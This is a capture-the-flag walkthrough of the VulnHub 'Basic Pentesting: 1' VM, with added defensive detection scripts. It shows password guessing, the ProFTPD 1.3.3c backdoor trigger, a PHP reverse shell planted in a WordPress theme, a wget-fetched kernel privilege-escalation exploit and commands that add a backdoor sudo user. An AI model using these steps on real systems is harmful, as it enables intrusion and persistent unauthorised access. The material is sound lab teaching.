Basic Pentesting: 1 is the first of a two-series challenge that demonstrates the pitfalls of using weak passwords and default settings. The walkthrough will show multiple weaknesses and exploits to achieve both low-privilege and root-privileged shells. A local privilege escalation will be used with the low-privilege shells to gain root-level access. The objective of this CTF is to compromise the Challenge VM, gaining root-level privileges.

This walkthrough uses an assessment format I’ve been developing rather than showing just the compromise highlights. As a result, the walkthrough runs long, but hopefully does a good job of communicating the vulnerabilities and exploits present on the host. 

The Challenge

VM Author: Josiah Pierce
VulnHub Link

The author of this VulnHub challenge describes it as:

“This is a small boot2root VM I created for my university’s cyber security group. It contains multiple remote vulnerabilities and multiple privilege escalation vectors. I did all of my testing for this VM on VirtualBox, so that’s the recommended platform. I have been informed that it also works with VMware, but I haven’t tested this personally.

This VM is specifically intended for newcomers to penetration testing. If you’re a beginner, you should hopefully find the difficulty of the VM to be just right.

Your goal is to remotely attack the VM and gain root privileges. Once you’ve finished, try to find other vectors you might have missed! If you enjoyed the VM or have questions, feel free to contact me at: [email protected]

If you finished the VM, please also consider posting a writeup! Writeups help you internalize what you worked on and help anyone else who might be struggling or wants to see someone else’s process. I look forward to reading them!”

My Environment

VMware Fusion v11.02, with an up-to-date version of Kali Linux, was used to complete this challenge. An Apache web server on the Kali host was also used to transfer files to the Challenge VM. Although the Challenge VM was designed for VirtualBox, it imported into VMware Fusion without any issues.

Executive Summary

A root-privilege shell can be achieved by:

  • Exploiting insecure user credentials
  • Exploiting the compromised ProFTPD application

The following vulnerabilities were used to gain root-level access:

  • A compromised version of ProFTPD is exploitable via a source-implemented backdoor
  • An Ubuntu local privilege escalation BPF vulnerability (CVE-2017-16995)

Low-privilege shell access can be achieved by:

  • Utilizing guest console access
  • Overwriting then invoking a WordPress PHP file with malicious PHP code

All low-privilege shells can be elevated to root-privilege by:

  • Exploiting a local privilege escalation eBPF vulnerability (CVE-2017-16995)

In all scenarios, once a root-privilege shell is achieved, users with root access can be created for persistent access to the host.

Note: This walkthrough does not enumerate all the vulnerabilities with this host. There may be other vulnerabilities and techniques of obtaining a root-privilege shell that were not initially discovered or utilized.

Reconnaissance / Information Gathering

Exploring the Login Console

Since this challenge boots into a graphical login screen let’s take a quick look. At first glance we can see that the Challenge VM might be Ubuntu-based, running version 16.04 LTS (Xenial Xerus).
Ubuntu Version
Some of the highlights for this version of Ubuntu are:

  • Linux Kernel 4.4
  • OpenSSH 7.2p2
  • Python 3
  • Golang 1.6
  • Apt 1.2

The upper-left corner displays what looks like the hostname, vtcsec.
Hostname
The Ubuntu Display Manager, LightDM in Xenial, is responsible for the Unity Greeter (the login screen). In this case, it appears to be running with its default settings, which show the available user accounts and allow guest logins.
User Login Window
Since we do not yet know the password for marlinspike, let’s see if we can log in with a Guest Session.
Guest Login Window
Well, that was easy: after clicking on “Guest Session”, then on “Log In”, we were able to start a temporary guest session.
Guest Desktop
Let’s open a terminal session by right-clicking on the background, then selecting the terminal option. The id command shows the UID, GID, and group membership, and we can also confirm that the hostname is vtcsec.
Guest Terminal Console
Let’s take a crack at the marlinspike account. There are a lot of lists that show common user passwords, the following is a pretty good sample.

  1. Passwords that are the same as the username
  2. Personal information as password (name, city, birthday, family member names)
  3. welcome
  4. qwert
  5. abc123
  6. password

Let’s select the marlinspike account, then try a password that matches the username. Bingo! Let’s open a terminal session by right-clicking on the background, then selecting the terminal option. Again, the id command shows the UID and GID for the user, and that the marlinspike account is a member of the admin and sudo groups. In Ubuntu, the root user is disabled by default, but if we run the sudo -i command we get a root login shell.
MarlinSpike Terminal Console
At this point we have full root access to the Challenge VM with minimal effort and can start harvesting information from this host. This is a good reminder to avoid simple passwords and to understand and change default settings.
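
An added defender-side check, not part of the original walkthrough: it parses a LightDM configuration and reports whether the two greeter settings abused above (guest sessions and the visible account list) are still at their permissive defaults. The two sample configurations are constructed; the key names allow-guest and greeter-hide-users are LightDM's own.

```python
import configparser
import sys
from typing import List

# Constructed sample: a stock Ubuntu 16.04 /etc/lightdm/lightdm.conf with no
# hardening keys, so LightDM's built-in defaults apply (guest allowed, user list shown).
DEFAULT_CONF = """
[Seat:*]
user-session=ubuntu
"""

# Constructed sample: the same file with both settings turned off.
HARDENED_CONF = """
[Seat:*]
user-session=ubuntu
allow-guest=false
greeter-hide-users=true
"""

# (key, value we want, what the default exposes)
CHECKS = [
    ("allow-guest", "false", "guest sessions give a password-less local shell"),
    ("greeter-hide-users", "true", "greeter lists account names, so only the password needs guessing"),
]


def audit_lightdm(conf_text: str) -> List[str]:
    """Return one finding per seat setting still at its permissive default.

    LightDM reads seat settings from [Seat:*] (or the older [SeatDefaults]);
    a missing key means the built-in default, which for both keys is the open one.
    """
    parser = configparser.ConfigParser(interpolation=None)
    parser.read_string(conf_text)
    findings = []
    for key, want, risk in CHECKS:
        value = None
        for section in ("Seat:*", "SeatDefaults"):
            if parser.has_option(section, key):
                value = parser.get(section, key).strip().lower()
                break
        if value != want:
            shown = "unset (default)" if value is None else value
            findings.append(f"{key}={shown}: {risk}; set {key}={want}")
    return findings


if __name__ == "__main__":
    # Audit a real file when run directly; defaults to the system config path.
    path = sys.argv[1] if len(sys.argv) > 1 else "/etc/lightdm/lightdm.conf"
    with open(path, encoding="utf-8") as fh:
        for finding in audit_lightdm(fh.read()) or ["no findings"]:
            print(finding)
```

LightDM merges /usr/share/lightdm/lightdm.conf.d/*.conf, /etc/lightdm/lightdm.conf.d/*.conf and /etc/lightdm/lightdm.conf in that order, so run the check on each file and remember that a later file overrides an earlier one.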

Remotely Exploring the Challenge VM

Next, let’s use a remote approach to exploring and exploiting this Challenge VM. To determine the IP address of the Challenge VM we can use either arp-scan or netdiscover.
ARP Scan
Command: arp-scan -I eth1 10.254.10.0/24

The arp-scan output shows that the IP address of the Challenge VM is 10.254.10.130.
Note: The 10.254.10.254 address is from the VMware DHCP server for this subnet.

NMap Light Scan

The lightweight scan shows that the Challenge VM has FTP, SSH, and HTTP services available.
Light NMap Scan
Command: nmap 10.254.10.130 --top-ports 10 --open

NMap Discovery Scan

Next, let’s try to get the service details using a more in-depth nmap scan.
Discovery NMap Scan
Command: nmap 10.254.10.130 -p- -sV -A

The discovery scan shows:

  • The FTP service is running ProFTPD v1.3.3c
  • The SSH service is running OpenSSH v7.2p2 (4ubuntu2.2 package) on an Ubuntu host
  • The web service is running Apache v2.4.18

NMap UDP Scan

To help get a complete picture of the Challenge VM, let’s run a lightweight UDP scan.
NMap UDP Scan
Command: nmap -sU --top-ports 30 10.254.10.130 --open

UDP Port Probing
After some initial testing, it looks like only the IPP port (631/UDP) is responsive.

Exploring the Available Services

Let’s start by making a few requests to the known open services, using the application like an end-user would.

TCP 21 – FTP Service

As the earlier nmap discovery scan showed, the FTP service is running ProFTPD version 1.3.3c, and the banner confirms the hostname appears to be vtcsec. Several root login attempts using common/insecure passwords failed.
FTP Service
Command: ftp -v 10.254.10.130

TCP 22 – SSH Service

The earlier nmap discovery scan showed the SSH service is running OpenSSH v7.2p2 (4ubuntu2.2 package) on an Ubuntu host. The root login attempts using common/insecure passwords failed, but the exchange shows that both public keys and passwords are accepted on this host.
SSH Service
Command: ssh [email protected]

If we compare the 4ubuntu2 OpenSSH package to the Ubuntu package list, it shows a match for Xenial, 16.04 LTS.
SSH Package

TCP 80 – HTTP Service

Let’s start exploring the headers and default landing page from the web server.
Curl HTTP Service
Command: curl -i http://10.254.10.130 --no-styled-output

The main web page appears to be the default and is pretty basic. From our discovery scan, we expected this to be running Apache 2.4.18, on an Ubuntu host, nothing new here. Next, let’s try to enumerate any hidden directories.
Enumerate Hidden Directories with Gobuster
Command:
gobuster -e -u http://10.254.10.130/ -w /usr/share/wordlists/dirb/common.txt

The redirected http://10.254.10.130/secret link looks interesting. Let’s curl this directory to see what it will display.
Curl HTTP Service
Command: curl 10.254.10.130/secret/ | html2text

This directory appears to be a WordPress blog, which is definitely worth a more in-depth look. Let’s use Firefox to browse this page.

The page looks like a WordPress Site, but it is not resolving very well. Let’s click on the “Hello World!” post.
WordPress Site Page
After clicking on the “Hello World” blog post, we again see resolution issues. It looks like this page is being redirected from the IP address 10.254.10.130 to a vtcsec hostname. From what we’ve discovered so far, vtcsec is probably the hostname of this VM. Toggling on the Web Inspector shows a dnsNotFound net error.
Site Not Found Error Page
Let’s try adding a host entry for vtcsec so that it will resolve to the assigned DHCP address.
Modify /etc/hosts File
After refreshing this page, the WordPress site now looks fairly standard.
WordPress Site Page
On the bottom-right, there is a “Login” link; let’s try to launch the WordPress login page. The default username for WordPress is admin. Let’s try that username with a few common passwords (admin, password); maybe we will get lucky.
WordPress Login Page
Success! We now have admin access to this WordPress site. At this point, we can pretty easily obtain a low-privileged shell via Metasploit or by modifying one of the existing WordPress PHP pages with reverse-shell PHP code. Note that the WordPress version is 4.9 running the Twenty Seventeen theme.
WordPress Admin Dashboard
So far this Challenge VM has been pretty straightforward. With what we’ve discovered so far, we should have enough information to start putting together an exploit plan for this host. Alternatively, if we were unable to guess the admin credentials for WordPress, we could use wpscan to enumerate the users and perform a brute-force password attack with the following:

wpscan --url http://10.254.10.130/secret --wp-content-dir 10.254.10.130/secret/ --enumerate u
wpscan --url http://10.254.10.130/secret/ --passwords rockyou.txt -U admin --wp-content-dir 10.254.10.130/secret/ --max-threads 50

Note: For the passwords file we will use rockyou.txt available on Kali Linux.

Attack Surface

Discovery Review

So far, here is what we’ve learned about this VM:

  • The Ubuntu host is probably running Xenial, 16.04LTS
  • The FTP service is running ProFTPD v1.3.3c
  • The SSH service is running OpenSSH v7.2p2 (4ubuntu2.2 package) on an Ubuntu host
  • The web service is running Apache v2.4.18
  • The web service has what appears to be a default main page
  • The WordPress site is installed in the /secret/ directory
  • The WordPress site appears to be redirected from the IP address to the vtcsec hostname
  • The WordPress version is 4.9 running the Twenty Seventeen theme.
  • The WordPress login page is here: http://vtcsec/secret/wp-admin/
  • The WordPress admin login and password are admin & admin

Vulnerabilities

ProFTPD v1.3.3c

Command: searchsploit proftpd 1.3.3c
Results of proftpd searchsploit
Looks like this version of ProFTPD has a remote code execution (RCE) vulnerability. The file 15662.txt contains the compromise report; according to the report, the backdoor allows unauthenticated remote root access, but the report does not include any PoC code.

16921.rb is a Metasploit Ruby script. In reviewing the script, it looks like the backdoor is tied to the HELP command, then invoked with the string “ACIDBITCHEZ”, followed by the payload.

Here is the exploit that the ruby script calls. Note the two sock.put calls, the first invoking the backdoor, the second, sending the payload.
Ruby Script Sniplet
Let’s try this manually with netcat and see what happens.
Command: nc -nv 10.254.10.130 21

Note that the HELP ACIDBITCHEZ string does not return the “502 Unknown command” error we would expect, nor a “500 Invalid command” when a few empty lines are entered. Let’s try entering an OS command, such as id. Bingo, we have a root shell!
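
An added detection example, not part of the original walkthrough: it audits the client side of an FTP command stream (as a network sensor, or a ProFTPD ExtendedLog using the %r directive, would record it) and flags the backdoor trigger quoted above plus any non-FTP input that follows it. The session lines are constructed.

```python
import sys
from typing import List, Tuple

# Standard FTP verbs (RFC 959 plus the common RFC 2228/2389/3659 extensions);
# anything else arriving on port 21 deserves a look.
KNOWN_VERBS = {
    "USER", "PASS", "ACCT", "CWD", "CDUP", "SMNT", "QUIT", "REIN", "PORT", "PASV",
    "TYPE", "STRU", "MODE", "RETR", "STOR", "STOU", "APPE", "ALLO", "REST", "RNFR",
    "RNTO", "ABOR", "DELE", "RMD", "MKD", "PWD", "LIST", "NLST", "SITE", "SYST",
    "STAT", "HELP", "NOOP", "FEAT", "OPTS", "AUTH", "PBSZ", "PROT", "EPRT", "EPSV",
    "MDTM", "SIZE", "MLST", "MLSD", "XPWD", "XCWD", "XMKD", "XRMD", "XCUP", "CLNT",
}

# The trigger the Metasploit module (16921.rb) sends with HELP, as quoted above.
BACKDOOR_TRIGGER = "ACIDBITCHEZ"

# Constructed sample: client-to-server lines from one session.
SAMPLE_SESSION = [
    "USER anonymous",
    "PASS guest@",
    "SYST",
    "HELP",
    "HELP ACIDBITCHEZ",
    "id",
    "uname -a",
    "QUIT",
]


def audit_ftp_commands(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, reason) for each client line that is a backdoor indicator.

    A plain HELP is normal; HELP with the trigger argument is the backdoor.
    Once the trigger is seen, later non-FTP lines are input to the spawned shell.
    """
    findings = []
    armed = False
    for n, raw in enumerate(lines, 1):
        line = raw.strip()
        if not line:
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "HELP" and arg.strip().upper() == BACKDOOR_TRIGGER:
            findings.append((n, "ProFTPD 1.3.3c backdoor trigger sent via HELP"))
            armed = True
        elif verb not in KNOWN_VERBS:
            reason = ("non-FTP command after backdoor trigger (shell input)"
                      if armed else "unknown FTP verb")
            findings.append((n, reason))
    return findings


if __name__ == "__main__":
    # Read a command log from stdin when run directly, else use the sample.
    source = sys.stdin.read().splitlines() if not sys.stdin.isatty() else SAMPLE_SESSION
    for line_no, reason in audit_ftp_commands(source):
        print(f"line {line_no}: {reason}")
```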

OpenSSH v7.2p2

Command: searchsploit OpenSSH 7.2p2
Results of SSH searchsploit
Our options here appear limited to username enumeration. That one includes Python PoC code and could be useful, but it is not too interesting.

Apache v2.4.18

On initial investigation, nothing appeared promising in searchsploit or on the web. There are other options that should lead to an easier exploit.

WordPress version v 4.9

There are some possibilities with WordPress 4.9 that require authentication, but since we already have the admin site credentials, we are good to go for a low-privilege shell at minimum.

Ubuntu 16.04 LTS

We are looking for a local privilege escalation exploit to elevate the shell we will obtain from WordPress.
Command: searchsploit ubuntu 16.04
Results of Ubuntu searchsploit
Looks like we will have some options once we have our low-privileged shell.

Exploitation

Vulnerability Review

So far, here is what we’ve learned:

  • The ProFTPD service is exploitable via a source-implemented backdoor
  • The WordPress site is exploitable via page modification from learned admin credentials
  • Ubuntu 16.04 LTS is vulnerable to several local privilege escalation exploits

Since we’ve already shown that a root-privileged shell is achievable by exploiting the ProFTPD service, our focus will be on gaining a shell via the vulnerable WordPress site.

WordPress version v 4.9

Since we have admin access to the WordPress site, we can easily modify & replace one of the existing PHP files with a PHP reverse shell. A good template for this is available in Kali Linux, /usr/share/webshells/php/php-reverse-shell.php or directly from PenTestMonkey, http://pentestmonkey.net/tools/web-shells/php-reverse-shell.

The staging for the PHP reverse shell is pretty simple: just modify the IP and port to match the intended listener.
PHP Reverse Shell
Next, we’ll log in to the WordPress site with the admin credentials. Click on the “Appearance” icon, then select the “Editor” tool. We’ll be replacing the PHP code in the 404 template of the Twenty Seventeen theme with our reverse-shell PHP code. Click “Update File” in the editor to save the new 404.php file.

We’ll use a netcat listener to catch our PHP reverse shell.
Command: nc -nvlp 443

To invoke the reverse shell PHP code, launch FireFox with this link. Note that the link includes the secret directory and the theme directory where the original 404.php file resided.
Invoke PHP Reverse Shell
URL: http://vtcsec/secret/wp-content/themes/twentyseventeen/404.php

After we invoke the PHP reverse shell the browser will appear to hang, and if everything worked properly, netcat should have received our reverse shell.
Successful Reverse Shell

Command            Description
nc -nlvp 443       Start a netcat listener
uname -a           Display operating system information
lsb_release -a     Display distribution-specific information
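
An added defender-side example, not part of the original walkthrough: the theme-file swap above leaves a PHP file under wp-content that calls socket and process functions a template never needs, so this scanner walks a wp-content tree and reports every .php file containing such calls. The mini theme tree it builds is constructed; the 404.php stand-in only names the two calls, it is not the shell from the post.

```python
import os
import re
import tempfile
from typing import Dict, List

# PHP calls that have no business in a theme template; any of them in a
# wp-content file is a strong indicator of a planted web shell.
SUSPECT_CALLS = (
    "fsockopen", "pfsockopen", "proc_open", "popen", "shell_exec", "exec",
    "passthru", "system", "eval", "base64_decode", "assert",
)
# \b keeps "exec(" from matching inside "shell_exec(".
PATTERN = re.compile(r"\b(" + "|".join(SUSPECT_CALLS) + r")\s*\(", re.IGNORECASE)


def scan_php_tree(root: str) -> Dict[str, List[str]]:
    """Map each .php file under root to the suspect calls it contains (files with hits only)."""
    hits: Dict[str, List[str]] = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                found = sorted({m.group(1).lower() for m in PATTERN.finditer(fh.read())})
            if found:
                hits[os.path.relpath(path, root)] = found
    return hits


def build_sample_theme() -> str:
    """Create a constructed wp-content tree: a clean template plus a 404.php that
    has been replaced by a socket-plus-process skeleton (names only, no real shell)."""
    root = tempfile.mkdtemp(prefix="wpcontent-")
    theme = os.path.join(root, "themes", "twentyseventeen")
    os.makedirs(theme)
    with open(os.path.join(theme, "index.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php get_header(); ?>\n<main><?php the_content(); ?></main>\n"
                 "<?php get_footer(); ?>\n")
    with open(os.path.join(theme, "404.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php\n// constructed stand-in for the planted file\n"
                 "$sock = fsockopen($ip, $port);\n"
                 "$process = proc_open($shell, $descriptorspec, $pipes);\n")
    return root


if __name__ == "__main__":
    # Scan the constructed tree when run directly; pass a real wp-content path to scan_php_tree instead.
    for rel_path, calls in scan_php_tree(build_sample_theme()).items():
        print(f"{rel_path}: {', '.join(calls)}")
```

Pair this with a modification-time check on the theme directory: an edit made through the WordPress theme editor changes the file's mtime without any package or deployment activity to explain it.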

As expected, we can see that the web server is running under a low-privileged user, www-data. Note that the release is Ubuntu 16.04.3 LTS using a 4.10.0-28-generic Linux kernel. If we review the searchsploit results for ubuntu 16.04 from the Vulnerabilities section, we see that the 45010.c exploit fits our OS and Linux kernel.
Searchsploit PE Exploit
Since we’ll need a place to write our escalation exploit code, we see that we have full access to the /tmp/ directory.
Location to Write Exploit
We also have access to a gcc compiler and have verified that we can indeed write files to this location.
GCC Compiler Check
Privilege Escalation

All our previous exploits resulted directly in a root-level shell, while the WordPress reverse shell resulted in a low-privileged shell that needs escalation to acquire root. Our PHP shell has been very stable, not dropping unexpectedly. We’ve identified a potential local escalation exploit and have verified that our www-data user has access to a compiler and a writeable directory.

In reviewing the 45010.c code we see that it has been successful with Ubuntu 16.04 and a 4.10.0.42-generic kernel, so it looks like we will have a good chance of success with this exploit. The exploit is based on a BPF verifier vulnerability (CVE-2017-16995) that allows an unprivileged local user to escalate their privileges.

Additional information on the vulnerability and exploit can be found here:
https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html

The exploit code is well documented and appears clean, not containing code other than what it is intended to do. The code does not appear to need any additional modification or require anything special for compiling.

So, let’s stage this and give it a whirl. To get this onto the Challenge VM, we’ll copy the exploit code to our Kali web server then use wget to retrieve the exploit into the /tmp directory as it is writeable for the www-data user.
Successful Privilege Escalation
The exploit compiled without issues and we’ve got root!

Command                                Description
wget http://10.254.10.44/ctf/45010.c   Transfer the exploit to the target
gcc 45010.c -o 45010                   Compile the exploit code
chmod +x 45010                         Make the compiled exploit executable
./45010                                Run the compiled exploit
id                                     Verify the UID and GID are zero

We now have permissions to the root directory and have achieved a root-level shell.
Privilege Escalation Verification
Post Exploitation

Now that a root-level shell can be obtained, we can perform post-exploitation activities such as maintaining persistence and harvesting information from the host.

With the root shell we can add a new user with sudo permissions. The following commands work in Ubuntu, and do not require an interactive shell.

  • useradd -MN -G sudo ngray
  • echo "ngray:temp123" | chpasswd

Adding Root User
We can now SSH to the Challenge VM with our new user-id and sudo to a root-level shell.
SSH as New Root User
Now that we have reliable access to the host, we can drop an enumeration script on it to start reviewing what we now have access to. A good starting point for this is here: https://highon.coffee/blog/linux-local-enumeration-script/.
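
An added detection example, not part of the original walkthrough: the useradd and chpasswd commands above leave a recognisable trail in /var/log/auth.log, and this parser ties the account creation, the sudo group membership, the non-interactive password set and the later SSH login back to one new account. The log lines are constructed in the shadow-utils and PAM syslog format that Ubuntu 16.04 writes.

```python
import re
from typing import Dict, List

# Constructed sample auth.log lines for the persistence steps shown above.
SAMPLE_AUTH_LOG = """\
Dec 12 16:40:01 vtcsec CRON[2101]: pam_unix(cron:session): session opened for user root by (uid=0)
Dec 12 16:52:10 vtcsec useradd[2217]: new user: name=ngray, UID=1001, GID=1001, home=/home/ngray, shell=/bin/sh
Dec 12 16:52:10 vtcsec useradd[2217]: add 'ngray' to group 'sudo'
Dec 12 16:52:10 vtcsec useradd[2217]: add 'ngray' to shadow group 'sudo'
Dec 12 16:52:15 vtcsec chpasswd[2220]: pam_unix(chpasswd:chauthtok): password changed for ngray
Dec 12 16:53:02 vtcsec sshd[2260]: Accepted password for ngray from 10.254.10.44 port 51512 ssh2
Dec 12 16:53:30 vtcsec sudo:    ngray : TTY=pts/0 ; PWD=/home/ngray ; USER=root ; COMMAND=/bin/bash
"""

# Groups whose membership amounts to root on a stock Ubuntu host.
PRIV_GROUPS = {"sudo", "admin", "wheel", "root"}

NEW_USER = re.compile(r"useradd\[\d+\]: new user: name=(?P<name>[^,]+), UID=(?P<uid>\d+)")
ADD_GROUP = re.compile(r"useradd\[\d+\]: add '(?P<name>[^']+)' to group '(?P<group>[^']+)'")
CHPASSWD = re.compile(r"chpasswd\[\d+\]: .*password changed for (?P<name>\S+)")
SSH_LOGIN = re.compile(r"sshd\[\d+\]: Accepted \w+ for (?P<name>\S+) from (?P<src>\S+)")


def find_persistence(log_text: str) -> Dict[str, List[str]]:
    """Return, per newly created account that gained a privileged group, the
    ordered indicators seen for it (creation, group, password set, SSH login)."""
    events: Dict[str, List[str]] = {}
    for line in log_text.splitlines():
        m = NEW_USER.search(line)
        if m:
            events.setdefault(m["name"], []).append(f"created with UID {m['uid']}")
            continue
        m = ADD_GROUP.search(line)
        if m and m["name"] in events and m["group"] in PRIV_GROUPS:
            events[m["name"]].append(f"added to privileged group {m['group']}")
            continue
        m = CHPASSWD.search(line)
        if m and m["name"] in events:
            events[m["name"]].append("password set via chpasswd")
            continue
        m = SSH_LOGIN.search(line)
        if m and m["name"] in events:
            events[m["name"]].append(f"ssh login from {m['src']}")
    # Only accounts that were both created and given a privileged group are worth an alert.
    return {u: e for u, e in events.items() if any("privileged" in x for x in e)}


if __name__ == "__main__":
    for user, indicators in find_persistence(SAMPLE_AUTH_LOG).items():
        print(f"{user}: " + "; ".join(indicators))
```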

Summary

This challenge shows why weak passwords and default settings should not be used. The GUI login console displays the user-id of the last logged-in user, and that user has an insecure, easily guessable password. Guest-level access is also allowed, providing a low-privilege shell with no password required.

A root-privilege shell was achievable in minutes by being able to guess the password of the last logged in user. This user had membership in the sudo group, allowing an attacker to easily gain root permissions. These credentials also allowed for remote SSH access.

The guest-level access, while restricted to the console, is vulnerable to local privilege escalation, allowing an attacker with console access to gain a root-privilege shell. Note that local privilege escalation of guest access is not shown in this walkthrough but was tested.

The hidden WordPress site uses the default admin username along with an insecure, easily guessable, password. This allows an attacker to guess the admin credentials, obtaining administrative access to the WordPress application. No brute force required in any of these cases.

A root-privilege shell can be achieved by:

  • Exploiting insecure user credentials
  • Exploiting the compromised ProFTPD application

The following vulnerabilities were used to gain root-level access:

  • A compromised version of ProFTPD is exploitable via a source-implemented backdoor
  • An Ubuntu local privilege escalation BPF vulnerability (CVE-2017-16995)

Low-privilege shell access can be achieved by:

  • Utilizing guest console access
  • Overwriting then invoking a WordPress PHP file with malicious PHP code

All low-privilege shells can be elevated to root-privilege by:

  • Exploiting a local privilege escalation BPF vulnerability (CVE-2017-16995)

In all scenarios, once a root-privilege shell is achieved, users with root access can be created for persistent access to the host.

Note: This walkthrough does not enumerate all the vulnerabilities with this host. There may be other vulnerabilities and techniques of obtaining a root-privilege shell that were not initially discovered or utilized in this walkthrough.

References

  1. https://wiki.ubuntu.com/LightDM
  2. https://www.passworddragon.com/avoid-common-passwords
  3. https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/worst-passwords-2017-top100-slashdata.txt
  4. https://www.wikihow.com/Become-Root-in-Ubuntu
  5. https://hackingnewideas.wordpress.com/2014/01/02/how-to-upload-shell-in-wordpress-sites/
  6. http://pentestmonkey.net/tools/web-shells/php-reverse-shell
  7. https://www.aldeid.com/wiki/Exploits/proftpd-1.3.3c-backdoor
  8. https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
  9. https://highon.coffee/blog/linux-local-enumeration-script/

12/12/18 16:52